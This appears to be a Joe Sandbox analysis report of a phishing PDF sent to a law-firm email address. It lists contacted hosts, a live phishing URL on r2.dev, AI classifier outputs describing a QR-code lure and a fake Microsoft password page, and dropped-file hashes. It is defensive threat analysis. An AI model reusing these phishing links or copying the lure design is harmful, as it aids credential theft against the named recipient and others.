        		142.250.185.100
        		truefalse
          		high
          api.ipify.org
          		172.67.74.152
          		truefalse
            		high
            ib.anycast.adnxs.com
            		185.89.210.141
            		truefalse
              		high
              emailavailabilitysecure.info
              		164.92.90.203
              		truefalse
                		unknown
                o365.alnassers.net
                		147.79.74.176
                		truefalse
                  		high
                  pub-ded8309031d344399056bf442a8ef815.r2.dev
                  		172.66.0.235
                  		truetrue
                    		unknown
                    x1.i.lencr.org
                    		unknown
                    		unknownfalse
                      		high
                      secure.adnxs.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.comtrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          1.1.1.1
                          		unknownAustralia
                          		13335CLOUDFLARENETUSfalse
                          184.28.88.176
                          		unknownUnited States
                          		16625AKAMAI-ASUSfalse
                          173.194.76.84
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          185.89.210.141
                          		ib.anycast.adnxs.comGermany
                          		29990ASN-APPNEXUSfalse
                          142.250.185.100
                          		www.google.comUnited States
                          		15169GOOGLEUSfalse
                          151.101.130.137
                          		unknownUnited States
                          		54113FASTLYUSfalse
                          147.79.74.176
                          		o365.alnassers.netUnited States
                          		208485EKSENBILISIMTRfalse
                          142.250.181.238
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          2.23.197.184
                          		unknownEuropean Union
                          		1273CWVodafoneGroupPLCEUfalse
                          239.255.255.250
                          		unknownReserved
                          		unknownunknownfalse
                          142.250.185.131
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          142.250.185.142
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          52.5.13.197
                          		unknownUnited States
                          		14618AMAZON-AESUSfalse
                          142.250.186.131
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          172.66.0.235
                          		pub-ded8309031d344399056bf442a8ef815.r2.devUnited States
                          		13335CLOUDFLARENETUStrue
                          151.101.194.137
                          		code.jquery.comUnited States
                          		54113FASTLYUSfalse
                          172.217.18.10
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          164.92.90.203
                          		emailavailabilitysecure.infoUnited States
                          		46930ASN-DPSDUSfalse
                          199.232.210.172
                          		bg.microsoft.map.fastly.netUnited States
                          		54113FASTLYUSfalse
                          104.17.25.14
                          		cdnjs.cloudflare.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          172.64.41.3
                          		unknownUnited States
                          		13335CLOUDFLARENETUSfalse
                          172.67.74.152
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse

                          Private

                          IP
                          192.168.2.16

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1554531
                          Start date and time:2024-11-12 16:22:36 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:18
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:scan3762399_arleen@wcctxlaw.com.pdf
                          Detection:MAL
                          Classification:mal56.phis.winPDF@34/57@25/212
                          Cookbook Comments:
                          • Found application associated with file extension: .pdf

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.186.131, 142.250.181.238, 173.194.76.84, 184.28.88.176, 34.104.35.123
                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ssl-delivery.adobe.com.edgekey.net, xandr-g-geo.trafficmanager.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, geo2.adobe.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: scan3762399_arleen@wcctxlaw.com.pdf

                          LLM Input / Output

                          InputOutput
                          URL: PDF document Model: claude-3-haiku-20240307
                          ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Please use your smartphone camera to scan the QRcode be",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": true
}
                          URL: PDF document Model: claude-3-haiku-20240307
                          ```json
{
  "brands": [
    "Microsoft Corporation"
  ]
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Please authenticate with your office credentials to access the document",
  "prominent_button_name": "VIEW DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                          URL: Model: claude-3-5-sonnet-latest
                          {
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "brands": []
}
```

The provided image does not contain any visible brand logos or names. The image appears to be a financial statement or document that requires authentication to view. There are no brand names or logos visible in the header, footer, or body of the document.
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Sign in",
  "prominent_button_name": "Next",
  "text_input_field_labels": [
    "arleen@wcctxlaw.com"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Because you're accessing sensitive info, you need to verify your password.",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "brands": [
    "Microsoft"
  ]
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
{
  "brands": [
    "Microsoft"
  ]
}
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: gpt-4o
                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'.",    "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",    "The presence of a long, random-looking subdomain 'pub-ded8309031d344399056bf442a8ef815' is suspicious and not typical for Microsoft.",    "The URL does not contain any direct reference to Microsoft, which is unusual for a legitimate Microsoft page."  ],  "riskscore": 9}
Google indexed: False
                          URL: pub-ded8309031d344399056bf442a8ef815.r2.dev
            Brands: Microsoft
            Input Fields: arleen@wcctxlaw.com
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: gpt-4o
                          ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'.",    "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",    "The presence of a password input field on a non-Microsoft domain is suspicious.",    "The URL contains a long string of characters which is often used in phishing attempts to obfuscate the true nature of the site."  ],  "riskscore": 9}
Google indexed: False
                          URL: pub-ded8309031d344399056bf442a8ef815.r2.dev
            Brands: Microsoft
            Input Fields: Password

                          Created / dropped Files

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):290
                          Entropy (8bit):5.204350537962087
                          Encrypted:false
                          SSDEEP:
                          MD5:CC76F0763ED2F636E51E9B5FE5708E9A
                          SHA1:B132043FF7E1DB645FFA15F318F2DB0E89126927
                          SHA-256:8D4C47274644818983DC70C3FE974B91E053740041A8631F845057C71054E58A
                          SHA-512:07E5A69AF9A97E79FA4B716D49AE85A8B69251BEFA77EB9F5C329832DE3EAFAE580C1CD47DE6EB668FB86C3973FCFEB9FF7ED4DE12D1B949829579BDD6068F7F
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.153 1868 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-10:23:07.155 1868 Recovering log #3.2024/11/12-10:23:07.155 1868 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):334
                          Entropy (8bit):5.190356982058386
                          Encrypted:false
                          SSDEEP:
                          MD5:863EC6A33F06E6998A924A7E8FE9E72A
                          SHA1:5BCCD96F012E9D0BFB640F310DE55B912315D280
                          SHA-256:258CC4AEF5EEAA903CEECB79D1B0B7FD6282E0C12F397864C817E1CF981C5C77
                          SHA-512:16E3322976F472A23075A53598A959B210BD4C36243FE4DFFC6845C900EF1C8BADF8BFB2A7B189C28888771BD43FB1476ADD22C0BCF786ADB6BE3125AE67DE18
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.035 1978 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-10:23:07.045 1978 Recovering log #3.2024/11/12-10:23:07.046 1978 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:1362BE6C4F27BA60B976E7FB09129BF9
                          SHA1:DF28132C18D84C8BE7473F0D009761D80D25FDBA
                          SHA-256:05FE7FA92E84680DEDDF1170B7A3C8D1F91D364B353EDE5AD0818B16E83941EB
                          SHA-512:9DE848A03BED65AAF31C9DA3BA1BE61B943062E7DC0E17B0BDBF345F82B12F93A00476A1B473E3BD0064A5E1D723EFE7D33082C498B811E10FED0F03C37771CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375984992823415","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":227677},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d00a23c1-6033-400d-80f3-633178ce0f4f.tmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):4.985260378334126
                          Encrypted:false
                          SSDEEP:
                          MD5:1362BE6C4F27BA60B976E7FB09129BF9
                          SHA1:DF28132C18D84C8BE7473F0D009761D80D25FDBA
                          SHA-256:05FE7FA92E84680DEDDF1170B7A3C8D1F91D364B353EDE5AD0818B16E83941EB
                          SHA-512:9DE848A03BED65AAF31C9DA3BA1BE61B943062E7DC0E17B0BDBF345F82B12F93A00476A1B473E3BD0064A5E1D723EFE7D33082C498B811E10FED0F03C37771CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375984992823415","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":227677},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4099
                          Entropy (8bit):5.23101909398753
                          Encrypted:false
                          SSDEEP:
                          MD5:DC1936462E75D18119754535988C425C
                          SHA1:C30B7EF60EE8F9B1D0465B1257D377FDB5DE19D9
                          SHA-256:04E4567D2EA4B1739418AB597A325367D788EA0A984AFBE6A568A8FAA0BCB3A1
                          SHA-512:C6E91783E76DC9E27D36046880D9F1D01B3A0CADC031F0C8D447580C541296A643973AB9CBA995E54E05F78D7F317BC25A716B0C9021DFCDEDE70F17D97F66F8
                          Malicious:false
                          Reputation:unknown
                          Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_

                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):322
                          Entropy (8bit):5.166172123868359
                          Encrypted:false
                          SSDEEP:
                          MD5:CFBA7E5D054F9D7502266F0E39D00CC0
                          SHA1:B34CFEE3FA27FADF2C179314D637A0671A101604
                          SHA-256:1BCBB9A1F2E4DBF2F8204556CDD1A9189A29E4681F8F52E9615AA3AE7C8E801E
                          SHA-512:7E107674DE8E70DE3D2B3A4B8DA2DF503C8F675E1875A60CBA18CFBE53F1B35CC9E37172175F137F5AA1AA4DAAA58F456710FC2DF6580680783E7525B95CCDF8
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.197 1978 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-10:23:07.198 1978 Recovering log #3.2024/11/12-10:23:07.200 1978 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241112152310Z-160.bmp

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                          Category:dropped
                          Size (bytes):65110
                          Entropy (8bit):0.6984981473111966
                          Encrypted:false
                          SSDEEP:
                          MD5:682F2192C2752CC563827297A99810D7
                          SHA1:EA9591875D35C407F877940856907B1621BF3456
                          SHA-256:E97481FDF7752059F28BF3B1768A76F727C7460C6D4B051F0A104F1A9F919592
                          SHA-512:A6ACE9D9E6863F2FD47C1D4299C6AFB2DDC17AB18463CAAC0B32B357DCAA58D7799C5B8CD7F409B7DF013373EC58C3D197B1AB7AA2F7D73F8D6672CDAA678DA5
                          Malicious:false
                          Reputation:unknown
                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):57344
                          Entropy (8bit):3.291927920232006
                          Encrypted:false
                          SSDEEP:
                          MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                          SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                          SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                          SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):16928
                          Entropy (8bit):1.2142843970659385
                          Encrypted:false
                          SSDEEP:
                          MD5:2DF1837C1233DD8D6F32BA54709D54C1
                          SHA1:BAC6E5DBB37530FAD317AC3AD6AFCE99B18903A9
                          SHA-256:E4C3400702FECAA8C6B35C8081197B71595A24E19A47758435FE7BD7E3192CB8
                          SHA-512:E98D12E4EE494B77C1DE4C7D6D9335F1572821D777A82B9D6977A5AB16FDF0E2B0295911447C66DC908D9860C2DE57C5C342EB40734FFE445AE4515C3E5B66DA
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c......'k1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Certificate, Version=3
                          Category:dropped
                          Size (bytes):1391
                          Entropy (8bit):7.705940075877404
                          Encrypted:false
                          SSDEEP:
                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                          Malicious:false
                          Reputation:unknown
                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
                          Size (bytes):71954
                          Entropy (8bit):7.996617769952133
                          Encrypted:true
                          SSDEEP:
                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                          Malicious:false
                          Reputation:unknown
                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):192
                          Entropy (8bit):2.732136534099206
                          Encrypted:false
                          SSDEEP:
                          MD5:FEBA6513646D3831CA397A7BC8D8CDA4
                          SHA1:0AB013E4E344CAA802E124E3F33CAC177CF46CBD
                          SHA-256:684CE7188672EB405ED5EC45AFCD255529BA7945003A5155CE7A0C98EC212955
                          SHA-512:002FBB6FB77A0319DB3E7844B7370B65AC99B2C5EA21D2BD00C8DE84DDBE88377C40CE3669592F296F08EA441E809A80A74BC1513F76E4B9D14F0E9280B01652
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .............5..(....................................................... ..........W....1...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:modified
                          Size (bytes):328
                          Entropy (8bit):3.247897867253901
                          Encrypted:false
                          SSDEEP:
                          MD5:222C801B5593FEE6159521CA718FED30
                          SHA1:F5B550278D54A1DC8BAC69D398B422D9694E1A26
                          SHA-256:C229E6612583CD1D372F3E0B83773800B54DE973289BE3FF817902BDDF2C69E3
                          SHA-512:8DEA50B1DC7223C80EBFB114B879F413BEADC32E4ADAD1A8ADAC032F3ACC421D3FE613B3B6375ECF741E259E0D3FF0F08FF84774C09F033C55D15DC00422FBEE
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .........,N..5..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6744

                          Download File
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):1233
                          Entropy (8bit):5.233980037532449
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
